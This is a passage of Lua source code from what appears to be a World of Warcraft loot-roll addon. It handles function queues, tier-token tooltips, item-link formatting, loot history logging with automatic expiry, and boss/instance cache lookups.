	
	function ns.UpdateQueueFunction(amountIndex, timer, func, ...)
		local success = false
		for i=1, #queueforDelays do			
			if queueforDelays[i].amountIndex == amountIndex then
				queueforDelays[i].endTime = ( GetTime() + timer )
				queueforDelays[i].args = { ... } 	
				queueforDelays[i].func = func or queueforDelays[i].func
				
				success = true
				
				break
			end
		end
		
		handler.elapsed = 0
		handler:Show()

		return success, amountIndex
	end
	
	function ns.BreakQueueFunctionByID(amountIndex)
		for i=1, #queueforDelays do			
			if queueforDelays[i].amountIndex == amountIndex then
				tremove(queueforDelays, i)
				break
			end
		end
	end
	
	function ns.BreakQueueFunctionByName(name)
		CheckForQueueByName(name)
	end
	
	function ns.GetQueueFunctionArgs(amountIndex)
		for i=1, #queueforDelays do			
			if queueforDelays[i].amountIndex == amountIndex then
				return unpack(queueforDelays[i].args)
			end
		end
	end
end


do
	local GetInstanceInfo = GetInstanceInfo

	
	function ns:IsInstanceIgnored_Client()
		local name, type, difficulty, _, _, _, _, mapID = GetInstanceInfo()
	
		for i=1, #ns.db.ignorePerZoneClient do
			local data = ns.db.ignorePerZoneClient[i]			
			if data.zoneID == mapID then		
				if mapID == 1448 then
					local isShown = false
					for a=1, #data.values do						
						if difficulty == data.values[a].diff then
							return data.values[a].value
						end
					end
				end
			end
		end
		
		return true
	end
	
	function ns:IsInstanceIgnored_Server()
		local name, type, difficulty, _, _, _, _, mapID = GetInstanceInfo()
	
		for i=1, #ns.db.ignorePerZoneServer do
			local data = ns.db.ignorePerZoneServer[i]			
			if data.zoneID == mapID then		
				if mapID == 1448 then
					local isShown = false
					for a=1, #data.values do						
						if difficulty == data.values[a].diff then
							return data.values[a].value
						end
					end
				end
			end
		end
		
		return true
	end
end

do
	local session = 'LootTesting'
	local links = {
		"\124cffa335ee\124Hitem:87777:0:0:0:0:0:0:0:0:0:0\124h[Reins of the Astral Cloud Serpent]\124h\124r",
	--	"\124cffa335ee\124Hitem:124519:0:0:0:0:0:0:0:0:0:529:0:1:0\124h[Repudiation of War]\124h\124r",
		"\124cffa335ee\124Hitem:127959:0:0:0:0:0:0:0:0:0:0:0:1:0\124h[Helm of Hellfire's Vanquisher]\124h\124r",
		"\124cffa335ee\124Hitem:127953:0:0:0:0:0:0:0:0:0:0:0:1:0\124h[Нагрудник завоевателя Адского Пламени]\124h\124r",
	--	"\124cffa335ee\124Hitem:116660:0:0:0:0:0:0:0:0:0:0\124h[Ironhoof Destroyer]\124h\124r",
		"\124cffa335ee\124Hitem:124367:0:0:0:0:0:0:0:0:0:529:0:2:562:567\124h[Fang of the Pit]\124h\124r",
		"\124cffa335ee\124Hitem:124361:0:0:0:0:0:0:0:0:0:529:0:1:567\124h[Cursed Demonbone Longbow]\124h\124r",
	--	"\124cffa335ee\124Hitem:124382:0:0:0:0:0:0:0:0:0:529:0:1:567\124h[Edict of Argus]\124h\124r",
		"\124cffa335ee\124Hitem:124159:0:0:0:0:0:0:0:0:0:529:0:1:567\124h[Demon Prince's Ascendant Crown]\124h\124r",
	--	"\124cffa335ee\124Hitem:124330:0:0:0:0:0:0:0:0:0:529:0:1:567\124h[Helm of Precognition]\124h\124r",
		"\124cffa335ee\124Hitem:124355:0:0:0:0:0:0:0:0:0:529:0:1:567\124h[Fallen Defender of Argus]\124h\124r",
		"\124cffa335ee\124Hitem:113882:0:0:0:0:0:0:0:0:0:0:0:1:0\124h[Glutton's Kerchief]\124h\124r",
	}
	
	local info = session..'\n'..links[1]..'\n'..links[2]..'\n'..links[3]..'\n'..links[4]..'\n'..links[5]..'\n'..links[6]..'\n'..links[7]--..'\n'..links[8]..'\n'..links[9]
	
	local author = 'TESTER_MODE'
	local test = false
	
	function ns:StartTest()
		if not test then
			test = true
			
			ns:SendTestRollButtons()
			ns:ShowLootItems(info, author)
			ns:ShowLootRollsItemsList(info, author)
		end
	end
	
	function ns:EndTest()	
		if test then
			test = false
			
			ns:HideLootItems(session, author)
			ns:HideLootRollsItemsList(session, author)
			ns:ClearAllIgnoredRollIDs(session)
		end
	end
	
	function ns:ToggleTest()		
		if not test then
			ns:StartTest()
		else
			ns:EndTest()	
		end
	end
	
	function ns:SendTestRollButtons()
		local msg = ''
		
		for i=1, #ns.LootRollButtons do
			local data = ns.LootRollButtons[i]
		
			msg = format("%s%s\n%s\n%s\n%d\n", msg, data.name, data.tip, data.arg, data.icon)	
		end

		ns:SetNormalButtonSettings(msg, author)
		
		msg = ''
		
		for i=1, #ns.LootRollRelicButtons do
			local data = ns.LootRollRelicButtons[i]
		
			msg = format("%s%s\n%s\n%s\n%d\n", msg, data.name, data.tip, data.arg, data.icon)	
		end

		ns:SetRelicButtonSettings(msg, author)
		
		msg = ''
		
		for i=1, #ns.LootRollTokenButtons do
			local data = ns.LootRollTokenButtons[i]
		
			msg = format("%s%s\n%s\n%s\n%d\n", msg, data.name, data.tip, data.arg, data.icon)	
		end

		ns:SetTokenButtonSettings(msg, author)
	end

end

do

	local char
	local string_byte = string.byte
	local sub = sub
	
	local function chsize(char)
		if not char then
			return 0
		elseif char > 240 then
			return 4
		elseif char > 225 then
			return 3
		elseif char > 192 then
			return 2
		else
			return 1
		end
	end

	function ns:utf8sub(str, startChar, numChars)
	  if not str then return "" end
	  local startIndex = 1
	  while startChar > 1 do
		  local char = string_byte(str, startIndex)
		  startIndex = startIndex + chsize(char)
		  startChar = startChar - 1
	  end
	 
	  local currentIndex = startIndex
	 
	  while numChars > 0 and currentIndex <= #str do
		local char = string_byte(str, currentIndex)
		currentIndex = currentIndex + chsize(char)
		numChars = numChars -1
	  end
	  return str:sub(startIndex, currentIndex - 1)
	end
end

do
	local unknownColor2 = "FFA6A6A6"
	local UnitClass = UnitClass
	local Ambiguate = Ambiguate
	local UnitName = UnitName
	local RAID_CLASS_COLORS = RAID_CLASS_COLORS
	local MAX_CLASSES = MAX_CLASSES
	
	local classTag_to_ID = {}
	
	local numClasses = GetNumClasses();
	for i = 1, numClasses do
		local classDisplayName, class, classID = GetClassInfo(i);
		if class then
			classTag_to_ID[class] = i
		end
	end
	
	function ns.GetClassInfo( class )
		local classID = classTag_to_ID[class]
	
		classID = classID or class
		
		if ( classID == true ) then
			return UNKNOWN, 'UNKNOWN', 0, 'ff606060'
		end
		
		local className, classFile, index = GetClassInfo(classID);
		
		return className, classFile, index, RAID_CLASS_COLORS[classFile].colorStr
	end
	
	function ns.GetColoredNameByClassFile(unit, classFile)
		
		local tUnit = Ambiguate(unit, "none")
		
		local short = UnitName(tUnit)
		if not short then
			short = Ambiguate(unit, "short")
		end
		
		local color = unknownColor2
		if classFile and RAID_CLASS_COLORS[classFile]then
			color = RAID_CLASS_COLORS[classFile].colorStr or unknownColor2
		end	
	
		return '|c'..color..short..'|r'
		
	end
	
	function ns.GetColoredName(unit)
	
		local tUnit = Ambiguate(unit, "none")
		local _, class = UnitClass(tUnit)
		
		local short = UnitName(tUnit)
		if not short then
			short = Ambiguate(unit, "short")
		end
		
		local color = unknownColor2
		if class then
			color = RAID_CLASS_COLORS[class] and RAID_CLASS_COLORS[class].colorStr or unknownColor2
		end	
	
		return '|c'..color..short..'|r'
	end
	
	function ns.GetColoredNameByID(unit, classID)
		
	--	print('T', 'GetColoredNameByID', unit, classID)
		local tUnit = Ambiguate(unit, "none")
		
		local _, class = GetClassInfo(classID);
		
		local short = UnitName(tUnit)
		if not short then
			short = Ambiguate(unit, "short")
		end
		
		local color = unknownColor2
		if class then
			color = RAID_CLASS_COLORS[class] and RAID_CLASS_COLORS[class].colorStr or unknownColor2
		end	
	
		return '|c'..color..short..'|r'
	
	end
end

do
	-- /script DEFAULT_CHAT_FRAME:AddMessage("\124cffa335ee\124Hitem:124160:0:0:0:0:0:0:0:0:0:529:0:1:0\124h[Cowl of the Arcanic Conclave]\124h\124r");
	-- /script DEFAULT_CHAT_FRAME:AddMessage("\124cffa335ee\124Hitem:124160:0:0:0:0:0:0:0:0:0:529:0:1:566\124h[Cowl of the Arcanic Conclave]\124h\124r");
	local linkPattern = ns.IsLegion and '|Hitem:%d::::::::::529::1:%d|h[L]|h' or '|Hitem:%d:0:0:0:0:0:0:0:0:0:529:0:1:%d|h[L]|h'
	
	local tierTokenItemList = {
		-- HFC
		-- Head
		[127959] = {
			['MAGE'] = 124160,
			['ROGUE'] = 124263,
			['DEATHKNIGH'] = 124332,
			['DRUID'] = 124261,		
		}, -- Rogue, Death Knight, Mage, Druid 
		[127966] = {
			['WARRIOR'] = 124334,
			['HUNTER'] = 124296,
			['SHAMAN'] = 124297,
			['MONK'] = 124262,
		}, -- Warrior, Hunter, Shaman, Monk
		[127956] = {
			['PALADIN'] = 124333,
			['PRIEST'] = 124161,
			['WARLOCK'] = 124162,
		}, -- Paladin, Priest, Warlock
		
		-- Legs
		[127955] = {
			['PALADIN'] = 124339,
			['PRIEST'] = 124166,
			['WARLOCK'] = 124167,
		}, -- Paladin, Priest, Warlock
		[127960] = {
			['MAGE'] = 124165,
			['ROGUE'] = 124269,
			['DEATHKNIGH'] = 124338,
			['DRUID'] = 124267,		
		}, -- Rogue, Death Knight, Mage, Druid
		[127965] = {
			['WARRIOR'] = 124340,
			['HUNTER'] = 124301,
			['SHAMAN'] = 124302,
			['MONK'] = 124268,
		}, -- Warrior, Hunter, Shaman, Monk
		
		-- Hands
		[127954] = {
			['PALADIN'] = 124328,
			['PRIEST'] = 124155 ,
			['WARLOCK'] = 124156,
		}, -- Paladin, Priest, Warlock
		[127958] = {
			['MAGE'] = 124154,
			['ROGUE'] = 124257,
			['DEATHKNIGH'] = 124327,
			['DRUID'] = 124255,		
		}, -- Rogue, Death Knight, Mage, Druid
		[127964] = {
			['WARRIOR'] = 124329,
			['HUNTER'] = 124292,
			['SHAMAN'] = 124293,
			['MONK'] = 124256,
		}, -- Warrior, Hunter, Shaman, Monk
		
		-- Shoulders
		[127967] = {
			['WARRIOR'] = 124346,
			['HUNTER'] = 124307,
			['SHAMAN'] = 124308,
			['MONK'] = 124273,
		},	-- Warrior, Hunter, Shaman, Monk
		[127961] = {
			['MAGE'] = 124177,
			['ROGUE'] = 124274,
			['DEATHKNIGH'] = 124344,
			['DRUID'] = 124272,		
		}, -- Rogue, Death Knight, Mage, Druid
		[127957] = {
			['PALADIN'] = 124345,
			['PRIEST'] = 124178,
			['WARLOCK'] = 124179,
		}, -- Paladin, Priest, Warlock
		
		-- Chest
		[127962] = {
			['MAGE'] = 124171,
			['ROGUE'] = 124248,
			['DEATHKNIGH'] = 124317,
			['DRUID'] = 124246,		
		}, -- Rogue, Death Knight, Mage, Druid
		[127963] = {
			['WARRIOR'] = 124319,
			['HUNTER'] = 124284,
			['SHAMAN'] = 124303,
			['MONK'] = 124247,
		}, -- Warrior, Hunter, Shaman, Monk
		[127953] = {
			['PALADIN'] = 124318,
			['PRIEST'] = 124172,
			['WARLOCK'] = 124173,
		}, -- Paladin, Priest, Warlock

		-- Trinket
		[127970] = {
			['WARRIOR'] = 124523,
			['HUNTER'] = 124515,
			['SHAMAN'] = 124521,
			['MONK'] = 124517,
		}, -- Warrior, Hunter, Shaman, Monk
		[127968] = {
			['MAGE'] = 124516,
			['ROGUE'] = 124520,
			['DEATHKNIGH'] = 124513,
			['DRUID'] = 124514,		
		}, -- Rogue, Death Knight, Mage, Druid
		[127969] = {
			['PALADIN'] = 124518,
			['PRIEST'] = 124519,
			['WARLOCK'] = 124522,
		}, -- Paladin, Priest, Warlock
	}
	
	local MYTHIC_KEYWORD = PLAYER_DIFFICULTY6
	local HEROIC_KEYWORD = PLAYER_DIFFICULTY2
	
	local function IsMythicToken(link)		
		local checkForMythic = ns.CheckForContainTooltip(link, MYTHIC_KEYWORD)		
		return checkForMythic or false
	end
	
	local function IsHeroicToken(link)		
		local checkForHeroic = ns.CheckForContainTooltip(link, HEROIC_KEYWORD)		
		return checkForHeroic or false
	end
	
	local function HideTip(frame) GameTooltip:Hide(); frame:UnregisterEvent('MODIFIER_STATE_CHANGED'); ns.HideRelicInfoFrame() end
	local function HideTip2(frame) GameTooltip:Hide(); ResetCursor(); frame:UnregisterEvent('MODIFIER_STATE_CHANGED'); ns.HideRelicInfoFrame() end
	
	local showedRelics = {}
		
	local function AddRelic(link, itemID, index)	
		showedRelics[index] = true
		
		if ( link ) then
			local quality, ilvl,_, _, _, _, _, texture = select(3, GetItemInfo(link))
			local relicID = ns.GetItemID(link)
			local spellID = ns.SpellIDByRelic[itemID..'.'..relicID]
			local spellName, desc
			
			if spellID and GetSpellInfo(spellID) then
				spellName = GetSpellInfo(spellID)
				desc = GetSpellDescription(spellID)
			else
				spellName = 'Spell name is nil for >'..relicID..'-'..itemID..'<'
				desc = 'Desc is nil for spell:'..(spellID or 'nil')
			end
				
			local relicType = (select(3, C_ArtifactUI.GetRelicInfoByItemID(ns.GetItemID(link))))
			local r, g, b, hex = GetItemQualityColor(quality)
			
			GameTooltip:AddDoubleLine('\124T'..texture..':22:22:0:0:64:64:4:60:4:60\124t'..'|c'..hex..'('..ilvl..')|r'..spellName, ns.RelicTypes[relicType], 1,1,1, 0, 1, 0)
			GameTooltip:AddLine(' '..desc, 1,1,1, true)
			GameTooltip:AddLine(' ')
		end
		
		GameTooltip:Show()
	end
	
	local function ShowArtifactTooltip(itemID, link)
		local name = GetItemInfo(itemID)
		local iLevel = 750
		
		local _, relicLink1 = GetItemGem(link, 1)
		local _, relicLink2 = GetItemGem(link, 2)
		local _, relicLink3 = GetItemGem(link, 3)
		
		local relicLink1_retry = true
		local relicLink2_retry = true
		local relicLink3_retry = true
		
		local r, g, b, hex = GetItemQualityColor(6)
		
		local itemLevel = ns.CheckForContainTooltip(link, ns.ITEM_LEVEL_PATTERN) or ''
		
		GameTooltip:AddLine('['..name..'] '..itemLevel, r, g, b)
		
		local id, specName, description, icon, role, class = GetSpecializationInfoByID(ns.Artifacts[itemID])
		
		local classDisplayName, classTag, classID
		local numClasses = GetNumClasses();
		for i = 1, numClasses do
			classDisplayName, classTag, classID = GetClassInfo(i);
			if classTag == class then
				break
			end
		end
		
		local color = RAID_CLASS_COLORS[classTag]
		
		GameTooltip:AddLine('|T'..icon..':0|t'..specName, color.r, color.g, color.b)
		GameTooltip:AddLine(' ')

	--	print('T1', link, relicLink1,relicLink2,relicLink3) 
	--	print(GetSpecializationInfoByID(ns.Artifacts[itemID]))
	--	print(specName, classDisplayName, icon, role, class)
		
	--	GameTooltip:AddLine(' ')
		
		if ns.SpellIDByRelic then
			wipe(showedRelics)
			
			if relicLink1 then
				AddRelic(relicLink1, itemID, 1)
			else
				C_Timer.After(0.2, function()
					if not showedRelics[1] then
						AddRelic((select(2, GetItemGem(link, 1))), itemID, 1)
					end
				end)
			end
			
			if relicLink2 then
				AddRelic(relicLink2, itemID, 2)
			else
				C_Timer.After(0.2, function()
					if not showedRelics[2] then
						AddRelic((select(2, GetItemGem(link, 2))), itemID, 2)
					end
				end)
			end
			
			if relicLink3 then
				AddRelic(relicLink3, itemID, 3)
			else
				C_Timer.After(0.2, function()
					if not showedRelics[3] then
						AddRelic((select(2, GetItemGem(link, 3))), itemID, 3)
					end
				end)
			end
	
		else
			GameTooltip:AddLine(L['Restart client for correct work'], 1,0,0, true)
		end

		GameTooltip:Show()
	end
	
	local function SetItemTip(frame)
		if not frame.link then 
			return 
		end
		
		frame:RegisterEvent('MODIFIER_STATE_CHANGED')
		
		GameTooltip:SetOwner(frame, "ANCHOR_BOTTOMLEFT")
		
		local itemID = ns.GetItemID(frame.link)
		local tokenList = tierTokenItemList[itemID]
		local classIndex, specID, classFileName = ns.GetPlayerClassInfo()
		
		if ns.Artifacts[itemID] then
			
			local name = GetItemInfo(itemID)
			
			if name then
				ShowArtifactTooltip(itemID, frame.link)
			else
				C_Timer.After(0.3, function()
					ShowArtifactTooltip(itemID, frame.link)
				end)
			end
		elseif ns.db.EnableTokenItemHook and tokenList and tokenList[classFileName] then
			local bonus = 0
			if IsMythicToken(frame.link) then
				bonus = 566
			elseif IsHeroicToken(frame.link) then
				bonus = 567
			end
			
			local itemLink = format(linkPattern, tokenList[classFileName], bonus)
			
			GameTooltip:SetHyperlink(itemLink, classIndex, specID)
			
		elseif frame.classID and frame.azerite then
			local list = frame.azerite and { strsplit('-', frame.azerite) } or {}

			for k,v in pairs( list ) do
				list[k] = tonumber(v)
			--	print(k,v)
			end
			
			GameTooltip:SetHyperlink(frame.link, frame.classID, list)
		elseif frame.classID and frame.specID then		
			GameTooltip:SetHyperlink(frame.link, frame.classID, frame.specID)
		else
		
			local checkForClass = ns.CheckForContainTooltip(frame.link, ns.classSpecificItem)

			if checkForClass then
				local amount, list = ns.GetClassList(checkForClass)
				
				local classTag, classIndexed = next(list)
			
				if classIndexed then				
					local specID, specName = GetSpecializationInfoForClassID(classIndexed, 1);
					
					GameTooltip:SetHyperlink(frame.link, classIndexed, specID)
				else
					GameTooltip:SetHyperlink(frame.link, classIndex, specID)
				end
			else
				GameTooltip:SetHyperlink(frame.link, classIndex, specID)
			end
		end
		
		if IsArtifactRelicItem(itemID) then
			ns.GetRelicClassSpec(itemID, GameTooltip)
		end
		
	--	GameTooltip:AddLine(("Diffic %s"):format( IsMythicToken(frame.link) or  IsHeroicToken(frame.link) or 'Обычный'))
		
		if IsShiftKeyDown() then 
			GameTooltip_ShowCompareItem() 
		end
		if IsModifiedClick("DRESSUP") then 
			ShowInspectCursor() 
		else 
			ResetCursor() 
		end
	end
 
	
	local function ItemOnUpdate(self)
		if IsShiftKeyDown() then 
		--	GameTooltip_ShowCompareItem() 
		end
	--	CursorOnUpdate(self)
	end
	local function LootClick(frame, button)
		if ( IsModifiedClick("EXPANDITEM") and button == 'RightButton' ) then
			if C_AzeriteEmpoweredItem.IsAzeriteEmpoweredItemByID(frame.link) then
				OpenAzeriteEmpoweredItemUIFromLink(frame.link);
				return true;
			end
		end

		if button == 'RightButton' then
			return
		end

		if IsControlKeyDown() then 
			DressUpItemLink(frame.link)
		elseif IsShiftKeyDown() then 
			ChatEdit_InsertLink(frame.link) 
		end
	end
	local function SetTip(frame)
		GameTooltip:SetOwner(frame, "ANCHOR_RIGHT")
		GameTooltip:SetText(frame.tiptext)
	end

	ns.HideTip = HideTip
	ns.HideTip2 = HideTip2
	ns.SetItemTip = SetItemTip
	ns.ItemOnUpdate = ItemOnUpdate
	ns.LootClick = LootClick
	ns.SetTip = SetTip
	
	
	function ns.GameTooltip_OnTooltipSetItem(self)
		local _, link = self:GetItem()
		if not link then 
			ns.HideRelicInfoFrame()
		--	print('HideRelicInfoFrame')
			return; 
		end
		
		local itemString = string.match(link, "item[%-?%d:]+")
		
		if itemString then
			local _, itemID = strsplit(":", itemString)
	
		
			if IsArtifactRelicItem(itemID) then
				ns.GetRelicClassSpec(itemID, self)
			--	print('GetRelicClassSpec')
			else
				ns.HideRelicInfoFrame()
		--		print('HideRelicInfoFrame')
			end
		else
			ns.HideRelicInfoFrame()
		--	print('HideRelicInfoFrame')
		end
	end
end

do
	local specList = {250,251,252,102,103,104,105,253,254,255,62,63,64,268,269,270,65,66,70,256,257,258,259,260,261,262,263,264,265,266,267,71,72,73, 577, 581}
	local specIcons = {}
	local specRole = {}

	for i=1, #specList do
		local id = specList[i]
		local id, name, description, icon, role, class = GetSpecializationInfoByID(id)
		specIcons[id] = icon
		specRole[id] = role
	end

	function ns.GetSpecClassString(classID, spec)
		if spec and specIcons[spec] then
			return specIcons[spec]
		elseif classID and GetClassInfoByID(classID) and CLASS_ICON_TCOORDS[select(2, GetClassInfoByID(classID))] then
			local t = CLASS_ICON_TCOORDS[select(2, GetClassInfoByID(classID))]
			return "Interface\\TargetingFrame\\UI-Classes-Circles", t[1], t[2], t[3], t[4]
		end
		
		return 'Interface\\Icons\\Inv_misc_questionmark'
	end
	
	function ns.GetSpecRole(spec)
		if spec and specRole[spec] then
			return specRole[spec]
		end
		
		return false
	end

end

do

	
	local function customGSUBHandler(pre, itemname, post)
		return pre..'L'..post
	end
	
	
	function ns.ShortLink(link)
		link = link:gsub('|c%x%x%x%x%x%x%x%x', '')
		link = link:gsub('|r', '')
		link = link:gsub("(|Hitem:.-|h%[)(.-)(%]|h)", customGSUBHandler)
		
		return link
	end
	
	function ns.NumericItemLink(link, from)
		local numer = false
		
		if link then
			numer = link:match('|Hitem:(.-)|h%[')
		else
			print('Error on NumericItemLink:', link, from)
		end
		
		return numer
	end
	
	
	local function customGSUBHandler2(pre, itemname, post)
		local name = ns:utf8sub(itemname, 1, 12)
		return pre..name..'...'..post
	end
	
	function ns.ShortLinkName(link)
		if ns.db.EnableShornLootLink then
			link = link:gsub("(|Hitem:.-|h%[)(.-)(%]|h)", customGSUBHandler2)
		end
		
		return link
	end
end

do
	local date = date
	local tremove = table.remove
	local tonumber = tonumber
	local strsplit = strsplit
	local tinsert = table.insert
	local format = format
	
	local timeOut = 60 * 60 * 24 *30
	
	local pattern = '%d\n%s\n%s\n%s\nboss:%d\nzone:%d\n%s\n%d\n%s\n%s'
	
	local date_pattern = "%m/%d/%y"
	local time_pattern = "%H:%M:%S"
	local full_patterm = date_pattern..' - '..time_pattern
	
	
	function ns.Histoty_FormatDate(timestamp)
		return date(full_patterm, timestamp)
	end
	
	function ns.Histoty_FormatDate_Month(timestamp)
		return tonumber(date('%m', timestamp))
	end
	
	function ns.Histoty_FormatDate_MDY(timestamp)
		return date(date_pattern, timestamp)
	end
	
	function ns.History_ReceiveData(info, author)
	
		if not ns.db.EnableLootRollLog then return end
		
		local lootData = { strsplit('\n', info) }
	
		local name       = lootData[1]
		local class      = lootData[2]
		local link       = lootData[3]
		local buttonID   = lootData[4]
		local randIndex  = lootData[5]
		local bossID	 = lootData[6]

		--print('T', lootData[7], lootData[8], lootData[9])
		
		local rollID 	 = nil 
		local itemType = 'NORMAL'
	
		if IsArtifactRelicItem(link) then
			itemType = 'RELIC'
		elseif ns.IsTokenItem(link) then 
			itemType = 'TOKEN'
		end
				
		if lootData[7] and lootData[8] and lootData[9] then
			rollID = lootData[7]..'\n'..lootData[8]..'\n'..lootData[9]
		end
	
		local buttonName, buttonTip, buttonArg
		local isTrade
		local buttonColor = '|cFFFFFFFF'
		local rollText = ''
		if buttonID and tonumber(buttonID) then
			buttonName, buttonTip, buttonArg = ns:GetButtonIDInfo(tonumber(buttonID), itemType)
			buttonColor = ns.rollTypeColors[buttonTip] or '|cFFFFFFFF'
		elseif buttonID == 'TRADE' then
			isTrade = 'TRADE'
		end
		
		if buttonName then
		
			rollText = buttonColor..buttonName..'|r'
			
			if randIndex then
				local tempRand = tonumber(randIndex)
				
				if tempRand and tempRand > 0 then				
					rollText = rollText.." ("..L['GUI_DICEROLL']..": "..tempRand..')'
				end
			end
		end
		
		if ns:IsMasterLooter() then
			print('LH', ns.ShortLinkName(link), ns.GetColoredName(author), '->',ns.GetColoredNameByClassFile(name, class), '(|cFF00FF00'..L['ITEM_AWARDED']..'|r)', rollText)
		elseif ns.db.EnableAwardingLoot then
			print('LH', ns.ShortLinkName(link), ns.GetColoredName(author), '->',ns.GetColoredNameByClassFile(name, class), '(|cFF00FF00'..L['ITEM_AWARDED']..'|r)', rollText)
		end		
		
		ns.dprint('LH_3', ns.ShortLinkName(link), '->',ns.GetColoredNameByClassFile(name, class), '(|cFF00FF00'..L['ITEM_AWARDED']..'|r)', rollText)
		
		ns.History_AddLoot(name, link, class, isTrade or buttonName, randIndex, bossID, rollID, ns.GetColoredName(author))
	end
	
	function ns.History_AddLoot(unit, lootlink, class, buttonName, randIndex, bossID, rollID, author)
		local timestamp = time()
		
		local data = ns.Histoty_FormatDate_MDY(timestamp)
	
		ns.db.lootHistory_Date[data] = timestamp
		ns.db.lootHistory_Units[unit] = class or true
		
		if not ns.db.lootHistory_Date_Units[data] then
			ns.db.lootHistory_Date_Units[data] = {}
		end
		ns.db.lootHistory_Date_Units[data][unit] = class or true
	
		local instanceID = ns.Cache_GetInstanceByBossID(bossID)
		
		if bossID and instanceID then
			if not ns.db.lootHistory_Encounter_Boss[instanceID] then
				ns.db.lootHistory_Encounter_Boss[instanceID] = {}
			end			
			ns.db.lootHistory_Encounter_Boss[instanceID][bossID] = bossID
		else
			bossID, instanceID = ns.Cache_GetItemIDInfo(ns.GetItemID(lootlink))
			
			if bossID and instanceID then
				if not ns.db.lootHistory_Encounter_Boss[instanceID] then
					ns.db.lootHistory_Encounter_Boss[instanceID] = {}
				end			
				ns.db.lootHistory_Encounter_Boss[instanceID][bossID] = bossID
			end
		end
		
		local str = format(pattern, timestamp, ns.Histoty_FormatDate(timestamp), unit, lootlink, bossID or 0, instanceID or 0, buttonName or UNKNOWN, randIndex or -1, ns:ExportRollIDToString(rollID), author or '')
		
		tinsert(ns.db.lootHistory, str)
		
		ns.LootList_ResetPosition()
	end

	
	function ns.History_AddLootRandom()
		-- "\124cffa335ee\124Hitem:124382:0:0:0:0:0:0:0:0:0:529:0:4:41:562:565:567\124h[Edict of Argus]\124h\124r"
		local link = "\124cffa335ee\124Hitem:124382:0:0:0:0:0:0:0:0:0:529:0:4:41:562:565:567\124h[Edict of Argus]\124h\124r"
		local unit = 'unit'..fastrandom(1,15)
			unit = unit..'-Гордунни'..fastrandom(1,25)
			
		local timespamp = time()+fastrandom(-50, 50)
		local class = fastrandom(1, 10)
		
		local tDate = ns.Histoty_FormatDate_MDY(timestamp)
		
		ns.db.lootHistory_Date[tDate] = timespamp
		ns.db.lootHistory_Units[unit] = class
		
		if not ns.db.lootHistory_Date_Units[tDate] then
			ns.db.lootHistory_Date_Units[tDate] = {}
		end
		ns.db.lootHistory_Date_Units[tDate][unit] = class
		
		local bossID, instanceID = ns.Cache_GetItemIDInfo(ns.GetItemID(link))
		
		if instanceID and bossID then
			if not ns.db.lootHistory_Encounter_Boss[instanceID] then
				ns.db.lootHistory_Encounter_Boss[instanceID] = {}
			end			
			ns.db.lootHistory_Encounter_Boss[instanceID][bossID] = bossID
		end
		
		local str = format(pattern, timespamp, ns.Histoty_FormatDate(timestamp), unit, link, bossID or 0, instanceID or 0)
		
		tinsert(ns.db.lootHistory, str)
	end
	
	function ns.History_Reset()
		
		ns.db.lootHistory_Date = {}
		ns.db.lootHistory_Units = {}
		ns.db.lootHistory_Date_Units = {}
		ns.db.lootHistory = {}
		ns.db.lootHistory_Encounter_Boss = {}
		
	end
	
	local function ScanForClear(timestamp)
		local index = 1
		
		while ns.db.lootHistory[index] do
			local timestamp2 = strsplit('\n', ns.db.lootHistory[index])
			
			if ( timestamp - tonumber(timestamp2) ) > timeOut then
				tremove(ns.db.lootHistory, index);
				coroutine.yield();
			else
				index = index + 1;
			end	
		end
	end
	
	function ns.Histort_PostClearPrep(timestamp)
		local newUnitList = {}
		
		for tDate, timespamp1 in pairs(ns.db.lootHistory_Date) do
		
		--	print('T', tDate, ( timestamp - timespamp1 ) > timeOut)
			
			if ( timestamp - timespamp1 ) > timeOut then	

				for nameServer in pairs(ns.db.lootHistory_Date_Units[tDate]) do				
					ns.db.lootHistory_Units[nameServer] = nil
				end
				
				ns.db.lootHistory_Date_Units[tDate] = nil
				ns.db.lootHistory_Date[tDate] = nil
			else
				if ( ns.db.lootHistory_Date_Units[tDate] ) then
					for nameServer, class in pairs(ns.db.lootHistory_Date_Units[tDate]) do			
						newUnitList[nameServer] = class
					end
				end
			end
		end
		
		local missedUnits = 0
		
		for nameServer, class in pairs(ns.db.lootHistory_Units) do
			if class and not newUnitList[nameServer] then
				missedUnits = missedUnits + 1
				ns.db.lootHistory_Units[nameServer] = nil
			end
		end
		
		for nameServer, class in pairs( newUnitList ) do		
			ns.db.lootHistory_Units[nameServer] = class
		end
		
		wipe(newUnitList)
	end
	
	function ns.History_AutoClear()
	
		local start = GetTime()
		
		local func = function()
			local timestamp = time()
			ScanForClear(timestamp)
			ns.Histort_PostClearPrep(timestamp)
			
			--print('History_AutoClear - End in', GetTime()-start)
		end
		
		--print('History_AutoClear - Start')
		
		local co = coroutine.create(func);
		ns.dynFrame.AddAction("l", co);
	end
end

do
	local pairs = pairs
	
	function ns.CompareTables(t1, t2)
		local t1_num = #t1

		local sameValues = 0
		local containSame = false
		
		for i, value in pairs(t1) do		
			for i2, value2 in pairs(t2) do				
				if value == value2 then
					sameValues = sameValues + 1
					containSame = true
				end
			end
		end
		
		
		return t1_num == sameValues, containSame
	end

end

do
	local LootHelperCache = {}

	function ns.GuidToID(guid)	
		if not guid then 
			return 0 
		else
			local id = guid:match("[^%-]+%-%d+%-%d+%-%d+%-%d+%-(%d+)%-%w+")
			return tonumber(id or 0)
		end
	end
	
	function ns.Cache_GetItemSourceByGUID(guid)	
		return false
	end
	
	function ns.Cache_GetBossInfoByID(id)
		
		for i=1, #LootHelperCache do 		
			for j=1, #LootHelperCache[i][3] do 
				if ( LootHelperCache[i][3][j][1] == id ) then 
					return LootHelperCache[i][3][j][1], 
							LootHelperCache[i][1],
							LootHelperCache[i][3][j][2],
							LootHelperCache[i][2]
				end 
			end
		end	

		return false
	end
	
	function ns.Cache_GetBossNameByID(id)
		
		for i=1, #LootHelperCache do 		
			for j=1, #LootHelperCache[i][3] do 
				if ( LootHelperCache[i][3][j][1] == id ) then 
					return LootHelperCache[i][3][j][2]
				end 
			end
		end	
		
		return false
	end
	
	function ns.Cache_GetInstanceByBossID(id)

		for i=1, #LootHelperCache do 			
			for j=1, #LootHelperCache[i][3] do 
				if ( LootHelperCache[i][3][j][1] == id ) then 
					return LootHelperCache[i][1], LootHelperCache[i][2]
				end 
			end
		end

		return false
	end
	
	local bossIDByNameFast = {}
	
	function ns.Cache_GetBossIDByName(instanceID, name)		

		for i=1, #LootHelperCache do 
			if LootHelperCache[i][1] == tonumber(instanceID) then 				
				for j=1, #LootHelperCache[i][3] do 
					if ( LootHelperCache[i][3][j][2] == name ) then 
						return LootHelperCache[i][3][j][1]
					end 
				end
